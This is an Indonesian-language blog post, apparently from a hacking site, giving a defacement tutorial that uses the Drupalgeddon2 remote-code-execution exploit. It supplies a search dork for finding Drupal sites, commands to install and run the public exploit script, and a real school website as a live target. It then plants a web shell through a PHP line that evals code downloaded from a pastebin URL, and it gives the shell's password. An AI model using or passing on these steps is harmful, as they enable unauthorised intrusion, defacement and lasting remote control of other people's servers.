Drupal Geddon - RCE (Remote Code Execution)

drpl

Halo guys...Kali ini OMheker akan membagikan Tutorial Deface Menggunakan metode Drupal Geddon - RCE (Remote Code Execution) Ya langsung saja :

Dork : intext:"powered by drupal" (kembangkan)

Buka Termux/Terminal :

pkg install git
gem install ruby
github.com/dreadlocked/Drupalgeddon2

Buka Folder nya :


cd  Drupalgeddon2

Cara menjalankan nya :


ruby drupalgeddon2.rb target.com

Contoh live :


ruby drupalgeddon2.rb http://school.unklab.ac.id
Jika berhasil, web tersebut akan connect ke terminal kalian.


IMG_20180423_152330

Cek lah dengan perintah


uname -a


IMG_20180423_152652

 Jika muncul kernel nya berarti berhasil.

Langsung saja kita upload shell kita , disini saya menggunakan shell LamonganXploiter, kalian juga bisa mengubah shell nya, cara upload nya kalian hanya tinggal ketik :


echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/en5tp4kX"));?>' > shell.php

Setelah terupload langsung saja kita cek shell kita di site.com/shell.php

Note*
Password Shell LAX adalah " LAX "

Mudah bukan?, Sampai Jumpa :D





Penulusuran terkait:
drupal rce
drupal rce exploit and upload shell
drupal exploit

drupalgeddon2 rb
deface drupal rce
cara deface dengan drupal rce

omheker berita seputar technologi, tutorial, hacking, dan open source

Disqus Comments